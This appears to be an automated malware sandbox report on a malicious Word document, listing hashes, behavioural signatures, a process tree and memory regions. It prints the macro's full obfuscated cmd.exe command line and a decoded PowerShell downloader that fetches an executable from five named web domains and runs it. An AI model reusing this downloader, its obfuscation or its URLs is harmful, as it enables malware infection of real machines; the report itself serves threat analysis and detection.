Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08-09-2024 06:51
Behavioral task
behavioral1
Sample
d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc
-
Size
79KB
-
MD5
d3c91738ad52ede18e7c98de0d688ee4
-
SHA1
b86e74fc6dc8d932006f3c189a743ed020cc0f77
-
SHA256
6dc235b67ec03448dd547ba027bb18ebb7131429138a85b9aaf9dc74933e1683
-
SHA512
f5dff51d938b2585f7b270a441ce23645b70906f566da72b7ea2ff1fad8beb97c257e6582657a6d84f5141172bc929388a19b9cf9c7e2af32b20a1a31226b4c1
-
SSDEEP
1536:vJK+lhLocn1kp59gxBK85fBt+a9pjduedt9+d5paxyN2:vJbla41k/W48jjduedt9+d5paxyQ
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2572 2660 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 2672 powershell.exe 9 2672 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 2572 cmd.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEcmd.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2660 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2672 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2660 WINWORD.EXE 2660 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2660 wrote to memory of 2912 2660 WINWORD.EXE splwow64.exe PID 2660 wrote to memory of 2912 2660 WINWORD.EXE splwow64.exe PID 2660 wrote to memory of 2912 2660 WINWORD.EXE splwow64.exe PID 2660 wrote to memory of 2912 2660 WINWORD.EXE splwow64.exe PID 2660 wrote to memory of 2572 2660 WINWORD.EXE cmd.exe PID 2660 wrote to memory of 2572 2660 WINWORD.EXE cmd.exe PID 2660 wrote to memory of 2572 2660 WINWORD.EXE cmd.exe PID 2660 wrote to memory of 2572 2660 WINWORD.EXE cmd.exe PID 2572 wrote to memory of 2672 2572 cmd.exe powershell.exe PID 2572 wrote to memory of 2672 2572 cmd.exe powershell.exe PID 2572 wrote to memory of 2672 2572 cmd.exe powershell.exe PID 2572 wrote to memory of 2672 2572 cmd.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\cmd.execmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9^,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5^,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}}3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
19KB
MD52c7be22cec7fb9aba52db13ec9fce84f
SHA182ba8b5262d8348e0add74ede565e6065401c4d5
SHA256cf29639e47e72e8674bf7af43ada3e67305d264b5c193d14001b895e0758953a
SHA5126d2331a6fc7df533c637c7aceac6891e0f4b7363f0124ec2fc5502dee8e3c33e88caddb54392ba9c683c8c597c157c9c4b0e5fa0972aa9f3384e9b021e6010c8
-
memory/2660-7-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-8-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-5-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-10-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-4-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-11-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-2-0x000000007140D000-0x0000000071418000-memory.dmpFilesize
44KB
-
memory/2660-0-0x000000002F711000-0x000000002F712000-memory.dmpFilesize
4KB
-
memory/2660-9-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-6-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-15-0x000000007140D000-0x0000000071418000-memory.dmpFilesize
44KB
-
memory/2660-16-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-17-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2660-37-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2660-38-0x000000007140D000-0x0000000071418000-memory.dmpFilesize
44KB